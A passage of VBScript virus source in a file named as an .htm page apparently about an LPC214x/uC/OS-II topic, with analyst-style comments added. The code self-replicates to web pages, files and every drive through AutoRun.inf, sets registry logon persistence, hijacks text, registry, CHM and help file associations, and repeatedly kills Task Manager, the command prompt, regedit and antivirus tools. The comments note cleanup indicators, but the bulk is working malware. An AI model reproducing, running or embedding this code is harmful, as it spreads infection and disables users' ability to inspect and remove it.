📄 lpc214x_ucosii.htm
If IsSexFile(pfi.Name) = True Then
pfi.Delete
End If
End Select
Next
Set psfo = pfo.SubFolders
For Each ps In psfo
If Cnt >= CntMax Then
Exit For
End If
Call SearchFile(objfso, ps.Path, VbsCode_WebPage, VbsCode_Victim, T)
Next
End Sub
'PYRHOYIQVQT2_11
'UARVKZXWUDPRG2_17
' PreInstance: single-instance check for this script.
' Queries WMI (root\cimv2, Win32_Process) for cscript.exe / wscript.exe processes and
' counts those whose command line contains WScript.ScriptFullName.
' Returns True when the count is 2 or more, otherwise False.
' Analyst note: the running copy presumably matches its own query, so a count of 2
' would mean a second copy is active. Errors are suppressed by On Error Resume Next.
Function PreInstance()
On Error Resume Next
Dim num_cnt
Dim strComputer, objWMIService, colProcessList, objProcess
num_cnt = 0
' Default result, kept unless the count below reaches 2.
PreInstance = False
' "." addresses the local machine in the WMI moniker.
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
' Only the two Windows Script Host executables are enumerated.
Set colProcessList = objWMIService.ExecQuery("Select * from Win32_Process Where " & "Name = 'cscript.exe' or Name = 'wscript.exe'")
For Each objProcess in colProcessList
' Substring match of this script's full path inside the process command line.
If InStr(CStr(objProcess.CommandLine), WScript.ScriptFullName)>0 Then
num_cnt = num_cnt + 1
End If
Next
If num_cnt>= 2 Then
PreInstance = True
End If
End Function
'PYRHOYIQVQT2_17
'UARVKZXWUDPRG2_19
' GetVersion: reads the version character embedded in a dropped copy of the script.
'   objfso - a FileSystemObject-style object (OpenTextFile is called on it)
'   path_v - path of the file to inspect
' Returns the single character that follows the first occurrence of Head_V in the file.
' Head_V is defined outside this listing; presumably it is the marker that opens the
' embedded code block - confirm against the full sample.
Function GetVersion(objfso, path_v)
Dim FV, buffer
' Mode 1 opens the file for reading.
Set FV = objfso.OpenTextFile(path_v, 1)
buffer = FV.ReadAll()
' One character, taken immediately after the Head_V marker.
GetVersion = Mid(buffer, InStr(buffer, Head_V) + Len(Head_V), 1)
End Function
' GetScriptCode: returns the text of the first script element on the hosting page whose
' Language attribute (lower-cased) equals Languages and is "vbscript" or "javascript".
'   Languages - lower-case language name to look for
' Returns nothing (Empty) when no element matches.
' Analyst note: "document" is not defined in this listing; the function only makes sense
' when the code runs inside an HTML page, which fits the .htm file this listing came from.
Function GetScriptCode(Languages)
On Error Resume Next
Dim soj
For Each soj In document.Scripts
If LCase(soj.Language) = Languages Then
' Both cases do the same thing: hand back the element's source text and stop.
Select Case LCase(soj.Language)
Case "vbscript"
GetScriptCode = soj.Text
Exit Function
Case "javascript"
GetScriptCode = soj.Text
Exit Function
End Select
End If
Next
End Function
' GetSelfCode: extracts the embedded code block from the file the script is running from.
'   objfso        - a FileSystemObject-style object
'   FullPath_Self - path of the file to read
' Returns the text from the first Head_V marker through the last Tail_V marker
' (the length expression includes one extra character after Tail_V).
' Analyst note: Head_V and Tail_V are defined outside this listing. Because the code sits
' between two fixed markers, the same markers can be searched for when checking files
' for this sample.
Function GetSelfCode(objfso, FullPath_Self)
On Error Resume Next
Dim n, n1, buffer, Self
Set Self = objfso.OpenTextFile(FullPath_Self, 1)
buffer = Self.ReadAll
' n: first Head_V position; n1: last Tail_V position.
n = InStr(buffer, Head_V)
n1 = InstrRev(buffer, Tail_V)
buffer = Mid(buffer, n, n1 - n + Len(Tail_V) + 1)
GetSelfCode = buffer
Self.Close
End Function
' GetMainBody: joins modules 2 .. Sum_ModelCode of vbsCode into one string.
'   vbsCode       - source text that GetModelCode is asked to cut modules from
'   Sum_ModelCode - index of the last module to include
' Each module is wrapped in a leading and a trailing CRLF. GetModelCode is defined
' outside this listing; module 1 is skipped here (the callers prepend a separate head).
Function GetMainBody(vbsCode, Sum_ModelCode)
Dim i
For i = 2 To Sum_ModelCode
GetMainBody = GetMainBody & VBCRLF & GetModelCode(vbsCode, i) & VBCRLF
Next
End Function
'PYRHOYIQVQT2_19
'UARVKZXWUDPRG1_5
' MonitorSystem: endless loop that, every 5000 ms, calls KillProcess with a fixed list of
' process names and then InvadeSystem. The loop has no exit condition.
'   objfso  - a FileSystemObject-style object, passed through to InvadeSystem
'   vbsCode - code text, passed through to InvadeSystem
' Analyst note: the list names Task Manager, the command prompt, the registry editor,
' msconfig and several security/cleanup tools, i.e. the programs a user would reach for
' to inspect or remove the sample. KillProcess is defined outside this listing. These
' tools closing again within seconds of being opened, while a wscript.exe process stays
' resident, is a behavioural indicator for triage.
Sub MonitorSystem(objfso, vbsCode)
On Error Resume Next
Dim ProcessNames
ProcessNames = Array("ras.exe", "360tray.exe", "taskmgr.exe", "cmd.exe", "cmd.com", "regedit.exe", "regedit.scr", "regedit.pif", "regedit.com", "msconfig.exe", "SREng.exe", "USBAntiVir.exe")
Do
Call KillProcess(ProcessNames)
' Re-applies the file copies and registry values on every pass (see InvadeSystem).
Call InvadeSystem(objfso, vbsCode)
WScript.Sleep 5000
Loop
End Sub
'PYRHOYIQVQT1_5
'UARVKZXWUDPRG1_3
' ExeVbs_Virus: entry point when the sample runs under Windows Script Host.
' It joins all command-line arguments into Para_V and dispatches on the last three
' characters (lower-cased):
'   "run"                      - calls Run on the first two characters of its own path
'   "txt"/"log", "reg", "chm", - launches the normal viewer (notepad, regedit, hh,
'   "hlp"                        winhlp32) for the file named in the arguments
'   anything else              - resident mode, driven by an order read from the file
'                                FullPath_Config
' Every branch except "UnLoadMe" / "KillVirus" rebuilds the code text from its own file
' and calls InvadeSystem and/or MonitorSystem.
' Analyst note: the extension cases match the file associations that InvadeSystem checks
' (txtfile, regfile, chm.file, hlpfile). Opening such a file would start this script
' first and the real viewer second, so the user sees the document open normally.
' Helpers referenced but not shown in this listing: GetFSOName, Run, VirusHead, WebHead,
' VictimHead, ChangeModelOrder, ChangeName, IsOK, ReadOK, WriteOK, SearchDrives,
' RestoreSystem; globals Head_V, Tail_V, Version, Sum_ModelCode, FullPath_V1,
' FullPath_Config, Cnt.
Sub ExeVbs_Virus()
On Error Resume Next
Dim objfso, objshell, FullPath_Self, Name_Self, Names
Dim oArgs, ArgNum, Para_V, SubPara_V, RunPath
Dim Order, Order_Order, Order_Para
Dim vbsCode , VbsCode_Virus, VbsCode_WebPage, VbsCode_Victim , MainBody
Set objfso = CreateObject(GetFSOName())
Set objshell = CreateObject("WScript.Shell")
FullPath_Self = WScript.ScriptFullName
Name_Self = WScript.ScriptName
' The two prefixes of the comment markers that delimit modules in this file
' (e.g. 'UARVKZXWUDPRG1_3 ... 'PYRHOYIQVQT1_3); handed to ChangeName below.
Names = Array("UARVKZXWUDPRG", "PYRHOYIQVQT")
Set oArgs = WScript.Arguments
ArgNum = 0
' Concatenate every argument, space separated, into Para_V.
Do While ArgNum < oArgs.Count
Para_V = Para_V & " " & oArgs(ArgNum)
ArgNum = ArgNum + 1
Loop
' The dispatch key is the last three characters of the joined arguments.
SubPara_V = LCase(Right(Para_V, 3))
Select Case SubPara_V
Case "run"
' First two characters of the script path, e.g. a drive letter plus colon.
RunPath = Left(FullPath_Self, 2)
Call Run(RunPath)
vbsCode = GetSelfCode(objfso, FullPath_Self)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
Call InvadeSystem(objfso, VbsCode_Virus)
Call Run(FullPath_V1)
Case "txt", "log"
' Open the requested file in Notepad so the association change is not noticed.
RunPath = "%SystemRoot%\system32\NOTEPAD.EXE " & Para_V
Call Run(RunPath)
vbsCode = GetSelfCode(objfso, FullPath_Self)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
Call InvadeSystem(objfso, VbsCode_Virus)
Call Run(FullPath_V1)
Case "reg"
' Same pattern for .reg files: hand the quoted path to regedit.exe.
Para_V = "regedit.exe " & """" & Trim(Para_V) & """"
Call Run(Para_V)
vbsCode = GetSelfCode(objfso, FullPath_Self)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
Call InvadeSystem(objfso, VbsCode_Virus)
Call Run(FullPath_V1)
Case "chm"
' Same pattern for .chm files: hand the quoted path to hh.exe.
Para_V = "hh.exe " & """" & Trim(Para_V) & """"
Call Run(Para_V)
vbsCode = GetSelfCode(objfso, FullPath_Self)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
Call InvadeSystem(objfso, VbsCode_Virus)
Call Run(FullPath_V1)
Case "hlp"
' Same pattern for .hlp files: hand the quoted path to winhlp32.exe.
Para_V = "winhlp32.exe " & """" & Trim(Para_V) & """"
Call Run(Para_V)
vbsCode = GetSelfCode(objfso, FullPath_Self)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
Call InvadeSystem(objfso, VbsCode_Virus)
Call Run(FullPath_V1)
Case Else
' Resident mode: leave if PreInstance reports another running copy.
If PreInstance = True Then
WScript.Quit
End If
' IsOK is not shown; it is given today's date and the config path. Presumably it
' reports whether the config file already records work for this date - confirm.
If IsOK(objfso, Date(), FullPath_Config) = False Then
If objfso.FileExists(FullPath_Config) = True Then
' The stored order has the form "<order>@<parameter>"; split at the first "@".
Order = Trim(ReadOK(objfso, FullPath_Config))
Order_Order = Trim(Mid(Order, 1, InStr(1, Order, "@") -1))
Order_Para = Trim(Mid(Order, InStr(1, Order, "@") + 1, Len(Order) - InStr(1, Order, "@")))
End If
Select Case Order_Order
Case "InfectFiles"
' Three variants are built from the same MainBody with different heads
' (WebHead, VictimHead, VirusHead); the first two are passed to SearchDrives.
vbsCode = GetSelfCode(objfso, FullPath_Self)
MainBody = GetMainBody(vbsCode, Sum_ModelCode)
VbsCode_WebPage = Head_V & Version & VBCRLF & WebHead() & MainBody & VBCRLF & Tail_V
VbsCode_WebPage = ChangeModelOrder(VbsCode_WebPage, Sum_ModelCode)
VbsCode_WebPage = ChangeName(VbsCode_WebPage, Names)
VbsCode_Victim = Head_V & Version & VBCRLF & VictimHead() & MainBody & VBCRLF & Tail_V
VbsCode_Victim = ChangeModelOrder(VbsCode_Victim, Sum_ModelCode)
VbsCode_Victim = ChangeName(VbsCode_Victim, Names)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 0)
' Running total kept in the config file; Cnt is a counter set outside this Sub.
Order_Para = Order_Para + Cnt
If Order_Para>2000 Then
' Past 2000 the stored order becomes "Msg" with a notice for the user; the
' "Msg" branch below displays it on a later run.
Call WriteOK(objfso, FullPath_Config, "Msg", "您已有超过2000个文件被感染!不过请放心,此病毒很容易被清除!请联系418465***-_- !")
Else
Call WriteOK(objfso, FullPath_Config, "InfectFiles", Order_Para)
End If
Call InvadeSystem(objfso, VbsCode_Virus)
Call MonitorSystem(objfso, VbsCode_Virus)
Case "Msg"
' Show the stored text, clear the order, then go resident as usual.
MsgBox Order_Para
Call WriteOK(objfso, FullPath_Config, "", "")
vbsCode = GetSelfCode(objfso, FullPath_Self)
MainBody = GetMainBody(vbsCode, Sum_ModelCode)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
Call InvadeSystem(objfso, VbsCode_Virus)
Call MonitorSystem(objfso, VbsCode_Virus)
Case "UnLoadMe"
' Built-in removal order: RestoreSystem (not shown), then exit.
Call RestoreSystem(objfso)
Wscript.Quit
Case "KillVirus"
' Built-in removal order: RestoreSystem, then SearchDrives with last argument 1.
' The two code arguments are never assigned in this branch; the meaning of the
' 0/1 argument is not visible here - presumably a mode switch, confirm in SearchDrives.
Call RestoreSystem(objfso)
Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 1)
Wscript.Quit
Case Else
' No recognised order: same work as "InfectFiles", but the count written to the
' config file starts from Cnt alone.
vbsCode = GetSelfCode(objfso, FullPath_Self)
MainBody = GetMainBody(vbsCode, Sum_ModelCode)
VbsCode_WebPage = Head_V & Version & VBCRLF & WebHead() & MainBody & VBCRLF & Tail_V
VbsCode_WebPage = ChangeModelOrder(VbsCode_WebPage, Sum_ModelCode)
VbsCode_WebPage = ChangeName(VbsCode_WebPage, Names)
VbsCode_Victim = Head_V & Version & VBCRLF & VictimHead() & MainBody & VBCRLF & Tail_V
VbsCode_Victim = ChangeModelOrder(VbsCode_Victim, Sum_ModelCode)
VbsCode_Victim = ChangeName(VbsCode_Victim, Names)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 0)
Call WriteOK(objfso, FullPath_Config, "InfectFiles", Cnt)
Call InvadeSystem(objfso, VbsCode_Virus)
Call MonitorSystem(objfso, VbsCode_Virus)
End Select
Else
' IsOK returned something other than False: no drive search, only the monitor loop.
vbsCode = GetSelfCode(objfso, FullPath_Self)
MainBody = GetMainBody(vbsCode, Sum_ModelCode)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody & VBCRLF & Tail_V 'build the complete code of the virus body
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode) 'change the order in which the modules are combined
VbsCode_Virus = ChangeName(VbsCode_Virus, Names) 'change the module marker names
Call MonitorSystem(objfso, VbsCode_Virus)
End If
End Select
Set objfso = Nothing
Set objshell = Nothing
End Sub
'PYRHOYIQVQT1_3
'UARVKZXWUDPRG2_25
' DeleteReg: deletes the registry key or value named by strkey via WScript.Shell.RegDelete.
'   strkey - full registry path
' No error handling is set up here; a failure raises in the caller's context.
Sub DeleteReg(strkey)
Dim tmps
Set tmps = CreateObject("WScript.Shell")
tmps.RegDelete strkey
Set tmps = Nothing
End Sub
' ReadReg: returns the registry value named by strkey via WScript.Shell.RegRead.
'   strkey - full registry path; a path ending in "\" reads the key's default value
' No error handling is set up here; a failure raises in the caller's context.
Function ReadReg(strkey)
Dim tmps
Set tmps = CreateObject("WScript.Shell")
ReadReg = tmps.RegRead(strkey)
Set tmps = Nothing
End Function
' WriteReg: writes a registry value via WScript.Shell.RegWrite.
'   strkey - full registry path
'   Value  - data to store
'   vtype  - registry type name; "" means let RegWrite pick its default type
Sub WriteReg(strkey, Value, vtype)
Dim tmps
Set tmps = CreateObject("WScript.Shell")
' The type argument is only passed through when the caller supplied one.
If vtype = "" Then
tmps.RegWrite strkey, Value
Else
tmps.RegWrite strkey, Value, vtype
End If
Set tmps = Nothing
End Sub
'PYRHOYIQVQT2_25
'UARVKZXWUDPRG1_7
' InvadeSystem: installs and re-asserts the sample's persistence. In order, it
'   1. calls AutoRun for every drive whose DriveType is 1, 2 or 3
'      (FileSystemObject values for removable, fixed and network drives),
'   2. writes the code text to FullPath_V1 and FullPath_V0 and calls SetFileAttr on each,
'   3. points the HKCU "...\Windows NT\CurrentVersion\Windows\Load" value at FullPath_V1,
'   4. checks the open command of txtfile, regfile, chm.file and hlpfile under
'      HKLM\SOFTWARE\Classes and calls the matching Set...FileAss helper when it differs
'      from the WScript.exe command line held in Value,
'   5. calls DeSafeSet.
'   objfso  - a FileSystemObject-style object
'   vbsCode - code text to write out
' Analyst note: the places listed in 1-4 are the artifacts to inspect and restore during
' cleanup - AutoRun.inf at drive roots, the two dropped files, the Load value, and the
' four shell\open\command defaults. MonitorSystem calls this Sub every 5 seconds, so
' restoring them while the script host process is still running does not hold.
' CopyFile, SetFileAttr, the Set...FileAss helpers, DeSafeSet, FullPath_V0, FullPath_V1
' and Version are defined outside this listing.
Sub InvadeSystem(objfso, vbsCode)
On Error Resume Next
Dim Value, HCULoad, vbsCode_Virus, dc, d
' Command line compared against the file-association keys below: WScript.exe runs
' FullPath_V0 and receives the opened file (%1) and remaining arguments (%*).
Value = "%SystemRoot%\System32\WScript.exe " & """" & FullPath_V0 & """" & " %1 %* "
HCULoad = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Load"
vbsCode_Virus = vbsCode
Set dc = objfso.Drives
For Each d In dc
If d.DriveType = 1 Or d.DriveType = 2 Or d.DriveType = 3 Then
Call AutoRun(objfso, d.DriveLetter, vbsCode_Virus)
End If
Next
' Both branches write the file; the first only adds a forced delete when an existing
' copy reports a lower version character than Version.
If objfso.FileExists(FullPath_V1) = True And GetVersion(objfso, FullPath_V1)< Version Then
objfso.DeleteFile FullPath_V1 , True
Call CopyFile(objfso, vbsCode_Virus, FullPath_V1)
Call SetFileAttr(objfso, FullPath_V1)
Else
Call CopyFile(objfso, vbsCode_Virus, FullPath_V1)
Call SetFileAttr(objfso, FullPath_V1)
End If
' Same handling for the second copy.
If objfso.FileExists(FullPath_V0) = True And GetVersion(objfso, FullPath_V0)<Version Then
objfso.DeleteFile FullPath_V0 , True
Call CopyFile(objfso, vbsCode_Virus, FullPath_V0)
Call SetFileAttr(objfso, FullPath_V0)
Else
Call CopyFile(objfso, vbsCode_Virus, FullPath_V0)
Call SetFileAttr(objfso, FullPath_V0)
End If
' Per-user logon persistence: rewritten whenever it no longer names FullPath_V1.
If ReadReg(HCULoad)<> FullPath_V1 Then
Call WriteReg (HCULoad, FullPath_V1, "")
End If
' File-association checks: each default open command is compared with Value.
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\")<>Value Then
Call SetTxtFileAss(FullPath_V0)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\")<>Value Then
Call SetRegFileAss(FullPath_V0)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\")<>Value Then
Call SetchmFileAss(FullPath_V0)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\")<>Value Then
Call SethlpFileAss(FullPath_V0)
End If
' Not shown in this listing; judging by the name it alters security-related settings - confirm.
Call DeSafeSet()
End Sub
'PYRHOYIQVQT1_7
'UARVKZXWUDPRG1_6
Sub AutoRun(objfso, D, vbsCode)
On Error Resume Next
Dim path_autorun, path_vbs, inf_autorun
path_autorun = D & ":\AutoRun.inf"
path_vbs = D & ":\" & Name_V1
If objfso.FileExists(path_vbs) = False Or objfso.FileExists(path_autorun) = False Or GetVersion(objfso, path_vbs)<Version Then
If objfso.FileExists(path_autorun) = True Then
objfso.DeleteFile path_autorun, True
End If
If objfso.FileExists(path_vbs) = True Then
objfso.DeleteFile path_vbs, True
End If
Call CopyFile(objfso, vbsCode, path_vbs)
Call SetFileAttr(objfso, path_vbs)
inf_autorun = "[AutoRun]" & VBCRLF & "Shellexecute=WScript.exe " & Nam